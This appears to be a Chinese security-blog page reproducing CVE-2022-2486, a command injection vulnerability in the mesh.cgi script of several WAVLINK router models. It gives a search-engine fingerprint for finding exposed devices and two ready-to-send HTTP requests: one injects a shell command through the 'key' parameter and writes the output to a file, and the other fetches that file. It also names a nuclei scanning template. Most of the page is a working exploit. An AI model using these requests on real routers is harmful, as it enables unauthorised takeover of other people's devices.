登录 白背景

WAVLINK mesh.cgi命令执行漏洞(CVE-2022-2486)

一、漏洞简介

WAVLINK是中国睿因科技(WAVLINK)公司开发的一款路由器,该系统mesh.cgi文件存在命令执行漏洞,攻击者可通过该漏洞获取服务器权限。包含型号WN530HG4、WN531G3、WN572HG3、WN535G3、WN575A4等。

二、影响版本

  • wavlink 路由器

三、资产测绘

  • hunterweb.body="firstFlage"
  • 特征

image.png

四、漏洞复现

GET /cgi-bin/mesh.cgi?page=upgrade&key=';ls>./1.txt;' HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

image.png
获取命令执行结果

GET /cgi-bin/1.txt HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

image.png
nuclei脚本
wanlink-router-mesh-cgi-rce.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/wnwb9zre4ushwzb8